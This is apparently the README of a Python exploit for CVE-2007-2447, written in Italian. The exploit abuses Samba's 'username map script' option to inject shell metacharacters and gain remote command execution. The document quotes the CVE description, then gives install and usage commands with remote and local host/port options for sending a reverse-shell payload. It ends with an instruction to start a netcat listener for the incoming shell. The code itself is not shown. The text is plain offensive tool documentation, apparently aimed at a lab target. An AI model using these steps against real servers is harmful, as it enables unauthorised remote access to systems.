
Exploit in Python per CVE-2007-2447 che sfrutta la vulnerabilità dello script username map di Samba, consentendo l'esecuzione remota di comandi tramite metacaratteri di shell con invio di payload di reverse shell.
"La funzionalità MS-RPC in smbd in Samba 3.0.0 fino a 3.0.25rc3 consente a un attaccante remoto di eseguire comandi arbitrari tramite metacaratteri shell che coinvolgono la funzione (1) SamrChangePassword, quando l'opzione "username map script" di smb.conf è abilitata, e consente a utenti autenticati remoti di eseguire comandi tramite metacaratteri shell che coinvolgono altre funzioni MS-RPC nella gestione della (2) stampante remota e (3) condivisione file."
[*] Questo exploit richiede Python 3.7 o superiore
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost -- Host remoto--lhost -- Host locale--lport -- Porta locale--rport -- Porta remota [*] Opzionale. default=445Non dimenticare di avviare il tuo listener:
nc -lvnp 4444
